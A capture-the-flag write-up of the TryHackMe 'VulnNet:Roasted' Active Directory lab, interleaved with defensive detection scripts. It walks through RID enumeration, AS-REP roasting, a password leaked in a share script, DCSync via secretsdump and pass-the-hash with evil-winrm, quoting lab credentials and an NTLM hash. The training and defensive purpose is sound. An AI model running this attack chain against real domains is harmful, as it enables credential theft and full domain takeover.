VulnNet:Roasted on Tryhackme

Before all

My second time going at an AD box; good fun ww

Victim’s IP : 10.10.225.254
Victim’s Host : vulnnet-rst.local
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command

rustscan -a 10.10.225.254 --ulimit 5000 -- -sC -sV -Pn

Result
(screenshots)

Basically a standard AD layout: Kerberos on port 88 and SMB on port 445.

Exploit

smb

Command

smbclient -L //10.10.225.254 -N

(screenshot)

Result
After connecting anonymously there is just a pile of odd(?) documents; nothing really useful.

(screenshot)

smb rid enumeration

Use crackmapexec to do SMB RID enumeration and pull out host, group and user names.
Command

crackmapexec smb 10.10.225.254 -u 'guest' -p '' --rid-brute

Result
(screenshots)

This turns up a handful of user accounts; they feed the next step.

TGT Attack

*Working directory: /opt/impacket/examples
Command

python3 GetNPUsers.py vulnnet-rst.local/ -usersfile ~/ctf/tryhackme/VulnNet-Roasted/userlist.txt -no-pass

Result
This dumps the AS-REP hash for t-skid.
(screenshot)
Crack the hash back to its plaintext with john.
(screenshot)
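The "TGT attack" above only works against accounts flagged "Do not require Kerberos preauthentication", and it leaves a clear footprint on the domain controller. The following is an added example (not part of this write-up) showing both sides of that from a defender's chair: a check for exposed accounts via the DONT_REQ_PREAUTH bit of userAccountControl, and a detection over Event ID 4768 entries. The account list, the log lines and the key=value flattening of the 4768 fields are constructed for the example; the IP addresses reuse the ones from the write-up.

```python
"""AS-REP roasting, seen from the defender's side.

Added example; not part of the original write-up. Two checks:
  - exposed_accounts(): accounts whose userAccountControl carries the
    DONT_REQ_PREAUTH bit (0x400000), which is what lets GetNPUsers.py
    obtain a crackable AS-REP for them without a password.
  - asrep_roast_alerts(): Event ID 4768 entries with Pre-Authentication
    Type 0 (no pre-auth performed) and RC4 ticket encryption (0x17),
    the combination an AS-REP roast request produces.
All account data and log lines below are constructed; the field names
are those of the 4768 event, flattened to key=value pairs.
"""

DONT_REQ_PREAUTH = 0x400000   # ADS_UF_DONT_REQUIRE_PREAUTH
RC4_HMAC = "0x17"             # etype 23, yields the $krb5asrep$23$ hash format

# Constructed: (sAMAccountName, userAccountControl). In a real audit these
# come from an LDAP query such as
# (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304)).
SAMPLE_ACCOUNTS = [
    ("t-skid", 0x10000 | DONT_REQ_PREAUTH),   # DONT_EXPIRE_PASSWORD + no pre-auth
    ("a-whitehat", 0x10000),
    ("enterprise-core-vn", 0x10200),          # NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD
]


def exposed_accounts(accounts):
    """Names whose userAccountControl has the DONT_REQ_PREAUTH bit set."""
    return [name for name, uac in accounts if uac & DONT_REQ_PREAUTH]


# Constructed 4768 events; addresses reuse the ones from the write-up.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=t-skid TicketEncryptionType=0x17 PreAuthType=0 IpAddress=10.9.195.189 Status=0x0
EventID=4768 TargetUserName=a-whitehat TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.10.225.254 Status=0x0
EventID=4768 TargetUserName=t-skid TicketEncryptionType=0x17 PreAuthType=2 IpAddress=10.10.225.254 Status=0x0
EventID=4768 TargetUserName=t-skid TicketEncryptionType=0x12 PreAuthType=0 IpAddress=10.9.195.189 Status=0x0
"""


def parse_event(line):
    """Split a flattened 'key=value key=value' event line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def asrep_roast_alerts(log_text, rc4_only=True):
    """Return (user, source IP) pairs for 4768 events that look roasted.

    PreAuthType 0 means the TGT was issued without pre-authentication, so
    the encrypted part of the reply can be attacked offline. With
    rc4_only=True only RC4 replies are reported (what GetNPUsers.py asks
    for); set it False to report every no-pre-auth issuance regardless
    of etype, which also catches AES-requesting tooling.
    """
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("PreAuthType") != "0":
            continue
        if rc4_only and ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        alerts.append((ev["TargetUserName"], ev["IpAddress"]))
    return alerts


if __name__ == "__main__":
    print("accounts without pre-auth:", exposed_accounts(SAMPLE_ACCOUNTS))
    for user, ip in asrep_roast_alerts(SAMPLE_4768):
        print(f"AS-REP roast indicator: {user} from {ip}")
```

The fix on the directory side is simply clearing the flag on every account the first check reports; the 4768 rule stays useful afterwards because it will fire the moment someone re-enables it.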

smb information gathering

With the password from the previous step we can get into SMB as an authenticated user.
Command

smbclient -U VULNNET-RST\\t-skid \\\\10.10.225.254\\NETLOGON

(screenshot)
A suspicious file, ResetPassword.vbs, sits in the share.
Note: smb: \> get ResetPassword.vbs - (the trailing "-" writes the file to stdout instead of saving it)

ResetPassword.vbs

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " & vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTName

The script contains the password of user a-whitehat in clear text: bNdKVkjv3RR9ht
Use it for the next step.
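The real weakness here is an administrative script with a domain password baked in, left on NETLOGON where every authenticated user can read it. As an added example (not code from this write-up), the scanner below reports lines in share-hosted scripts and configs that assign a value to a password-like name, masking the value so the report is not itself a leak. The file set is constructed; the VBS lines are the ones quoted from the share above, the other paths and values are made up for the example.

```python
"""Find hardcoded credentials in scripts published on a logon share.

Added example, not from the write-up. NETLOGON and SYSVOL are readable
by every authenticated user, so a password in a script there is a
password for the whole domain. This scanner reports lines that assign a
value to a password-like variable or pass one on a command line. File
contents below are constructed; the VBS lines are the ones quoted from
the share in the write-up.
"""
import re

# Case-insensitive names that usually hold a secret.
SECRET_NAMES = r"(?:pass(?:word|wd)?|pwd|secret|credential)"

PATTERNS = [
    # strPassword = "x", $password = 'x', Password=x inside a connection string
    re.compile(r"\b\w*" + SECRET_NAMES + r"\w*\s*=\s*[\"']?([^\"'\s;]+)", re.I),
    # /password:x or /pass=x style command-line switches
    re.compile(r"/pass(?:word)?[:=](\S+)", re.I),
]

# Constructed {path: contents}; a real run would walk the mounted share.
SAMPLE_FILES = {
    "NETLOGON/ResetPassword.vbs": (
        'strUserNTName = "a-whitehat"\n'
        'strPassword = "bNdKVkjv3RR9ht"\n'
        "objUser.SetPassword strPassword\n"
        'Wscript.Echo "Password reset, account enabled,"\n'
    ),
    "NETLOGON/login.ps1": '$password = "Winter2021!"\n',
    "NETLOGON/app.config": 'connectionString="Server=db;User Id=app;Password=hunter2;"\n',
    "NETLOGON/readme.txt": "Ask the helpdesk to reset your password.\n",
}


def mask(secret):
    """Keep two characters so a finding can be matched to its source."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_text(name, text):
    """Return (file, line number, masked value) for each suspect line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pat in PATTERNS:
            m = pat.search(line)
            if m:
                findings.append((name, lineno, mask(m.group(1))))
                break   # one finding per line is enough for triage
    return findings


def scan_files(files):
    """Scan a {path: contents} mapping and collect all findings."""
    return [f for name, text in files.items() for f in scan_text(name, text)]


if __name__ == "__main__":
    for path, lineno, masked in scan_files(SAMPLE_FILES):
        print(f"{path}:{lineno}: possible hardcoded secret {masked}")
```

Lines that merely mention the word "password" in a message, such as the Echo calls and the readme, are not reported, because the patterns require an assignment or a switch. Any finding means the credential has to be treated as compromised and rotated, not just removed from the file.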

secretsdump

With a-whitehat's credentials and impacket's secretsdump.py, dump the password hashes of every domain user.
Command

sudo python3 secretsdump.py -just-dc a-whitehat@vulnnet-rst.local

Result
(screenshot)
Success!!!
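What makes -just-dc work is not file access to NTDS.dit but the directory replication rights a-whitehat holds; the DC happily replicates every secret to any principal that has them. As an added example (not from the write-up), the detection below walks Event ID 4662 entries and reports replication-right use by anything other than a known domain controller. The DC name DC01$, the key=value flattening and the log lines are constructed; the three replication GUIDs are the well-known control-access right identifiers.

```python
"""Detect DCSync-style replication requests from non-DC principals.

Added example, not from the write-up. secretsdump.py -just-dc asks the
DC to replicate directory data over DRSUAPI, which any principal holding
the DS-Replication-Get-Changes rights may do. With the "Audit Directory
Service Access" subcategory enabled, that request logs Event ID 4662
whose Properties field lists the replication control-access GUIDs.
Only domain controllers (and, in some environments, directory-sync
service accounts) should ever exercise those rights. Log lines and the
DC name DC01$ are constructed for this example.
"""
import re

# Well-known control-access right GUIDs used for directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed: computer accounts allowed to replicate (your DC inventory).
KNOWN_REPLICATORS = {"DC01$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

# Constructed 4662 events flattened to key=value; Properties keeps the
# braces the real event uses. The last line is an ordinary attribute
# read with a placeholder GUID, included to show it is not reported.
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=DC01$ SubjectDomainName=VULNNET-RST ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=a-whitehat SubjectDomainName=VULNNET-RST ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=a-whitehat SubjectDomainName=VULNNET-RST ObjectType=user AccessMask=0x10 Properties={00000000-0000-0000-0000-000000000000}
"""


def parse_event(line):
    """Split a flattened 'key=value key=value' event line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def replication_rights(properties):
    """Names of replication rights referenced in a 4662 Properties field."""
    found = set(GUID_RE.findall(properties.lower()))
    return sorted(REPLICATION_RIGHTS[g] for g in found if g in REPLICATION_RIGHTS)


def dcsync_alerts(log_text, known_replicators=KNOWN_REPLICATORS):
    """(account, [rights]) for replication requests by unexpected principals."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if rights and ev.get("SubjectUserName") not in known_replicators:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in dcsync_alerts(SAMPLE_4662):
        print(f"replication by non-DC principal {account}: {', '.join(rights)}")
```

The same GUIDs are what to look for when reviewing the domain object's ACL: every principal granted them can pull every hash in the domain, so that list should be as short as the set of domain controllers plus whatever sync service is deliberately allowed.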

Pass The Hash Attack

Use the Administrator NTLM hash just obtained for a pass-the-hash (PTH) attack.
Command

evil-winrm -i 10.10.225.254 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d

(screenshot)
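A pass-the-hash logon like the evil-winrm session above authenticates with NTLM rather than Kerberos, so on the target it shows up as a 4624 network logon (LogonType 3) with AuthenticationPackageName NTLM. As an added example (not from the write-up), the rule below flags NTLM network logons of privileged accounts whose source is not a managed host on a management network. The host inventory, the management range, the key=value flattening and the log lines are constructed; the 10.9.195.189 address is the attacker address from the write-up.

```python
"""Flag NTLM network logons of privileged accounts from unmanaged hosts.

Added example, not from the write-up. Legitimate admin sessions from
domain-joined hosts normally use Kerberos, so an NTLM LogonType 3 event
for a high-privilege account from a workstation name or address outside
the managed inventory deserves an alert. The inventory, management
network and log lines below are constructed.
"""
import ipaddress

PRIVILEGED_ACCOUNTS = {"Administrator"}
KNOWN_HOSTS = {"DC01", "WS01"}                            # constructed inventory
MANAGEMENT_NETS = [ipaddress.ip_network("10.10.0.0/16")]  # constructed range

# Constructed 4624 events. The last line carries a known workstation name
# from an unknown address: WorkstationName is supplied by the client in
# NTLM, so it must never be trusted on its own.
SAMPLE_4624 = """\
EventID=4624 TargetUserName=Administrator LogonType=3 AuthenticationPackageName=NTLM WorkstationName=kali IpAddress=10.9.195.189
EventID=4624 TargetUserName=Administrator LogonType=3 AuthenticationPackageName=Kerberos WorkstationName=- IpAddress=10.10.5.20
EventID=4624 TargetUserName=a-whitehat LogonType=3 AuthenticationPackageName=NTLM WorkstationName=WS01 IpAddress=10.10.5.20
EventID=4624 TargetUserName=Administrator LogonType=3 AuthenticationPackageName=NTLM WorkstationName=WS01 IpAddress=10.10.5.20
EventID=4624 TargetUserName=Administrator LogonType=3 AuthenticationPackageName=NTLM WorkstationName=WS01 IpAddress=10.9.195.189
"""


def parse_event(line):
    """Split a flattened 'key=value key=value' event line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def from_managed_source(workstation, ip):
    """True only when both the host name and the address are expected."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # "-" when the event carries no address
        return False
    in_net = any(addr in net for net in MANAGEMENT_NETS)
    return workstation in KNOWN_HOSTS and in_net


def pth_alerts(log_text):
    """(user, workstation, ip) for suspicious NTLM network logons."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        if ev.get("TargetUserName") not in PRIVILEGED_ACCOUNTS:
            continue
        if not from_managed_source(ev.get("WorkstationName"), ev.get("IpAddress")):
            alerts.append((ev["TargetUserName"], ev["WorkstationName"], ev["IpAddress"]))
    return alerts


if __name__ == "__main__":
    for user, host, ip in pth_alerts(SAMPLE_4624):
        print(f"NTLM network logon for {user} from {host} ({ip})")
```

The rule deliberately requires both checks to pass: an attacker can put any string in WorkstationName, which is why the fifth sample line is still reported. Beyond detection, the hash this step relies on only exists because the earlier replication was possible, so the durable fix is tightening replication rights and rotating the Administrator credential.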

After all

I seem to have skipped a step somewhere, since user.txt lives in the directory of user enterprise-core-vn, but... whatever :D
Tired now; going back to look at some crypto instead (